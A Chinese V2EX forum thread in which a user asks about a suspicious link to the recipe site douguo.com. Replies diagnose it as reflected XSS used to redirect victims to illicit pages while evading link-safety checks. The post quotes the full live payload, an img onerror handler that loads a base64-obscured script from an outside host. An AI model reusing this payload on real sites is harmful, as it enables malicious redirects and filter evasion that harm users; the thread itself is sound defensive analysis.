这是什么套路?是注入攻击还是伪装非法业务?

52 天前
 jackOff

www.douguo.com 从这里进去是正常的食谱网站

https://m-pr.douguo.com/caipu/%E7%89%9B%E8%82%89?f=xss%22%3E%3Cimg%20src=x%20onerror=%22s=document.createElement(%27script%27);s.src=atob(%27Ly9zY3JpcHQudGlhbmppbmdjYWkuY24vMi5qcw==%27);document.body.appendChild(s)%22%3E&d=DxsAHxlTTkIOAkZBHQdPDgMBWgICBwQfSQwaQAcYVB1VBw1AIAYwJ1A8Ny0lRlBaUlxDV15ZUVRUV0FBAh0MAQ%3D%3D&qq_aio_chat_type=-1

在 qq 里发送这个链接就是类似涉黄约炮客服?

这到底是在正常网络业务里携带非法业务,还是网站被注入攻击了?

1527 次点击
所在节点    问与答
8 条回复
renmu
52 天前
我认为是被黑了,这个平台 11 年就有了,有备案,有商场等各种业务
Vancion
52 天前
被搞了。可以丢给 LLM 分析一下。大概就是 s.src=atob 后面那段,你自己 base64 解码也能看到加载的 js
sheeta
52 天前
xss 注入
MFWT
52 天前
典型的 XSS 注入,URL 解码一下就很清楚了,让 img 的 src 等于无效地址,然后通过 onerror 触发脚本,从第三方网页加载 js 文件插入到当前网页并执行

看着是利用这种人畜无害的链接做跳转站
imlonghao
52 天前
XSS
MFWT
52 天前
跟了一下,跳转过去是一个游戏网站(具体链接就不放了,跟踪所加载的 js 代码很容易发现)的 未鉴权 且 未做类型限制 的图床,被人抓口子上传非法网页了
pusheax
51 天前
反射型 XSS 。
这网站有一处漏洞,会把 get 参数的输入内容拼接到网页中。攻击者往 get 参数里面插跳转网页的 html 代码,当用户点击含有这段代码的连接时,就会触发 xss 跳转到恶意网站。
由于用户点击的链接其实是合法网站(之后才跳转非法网站),所以可以绕过一些安全检测(例如微信的“该网址已被多人举报”)。
jackOff
51 天前

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1148594

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX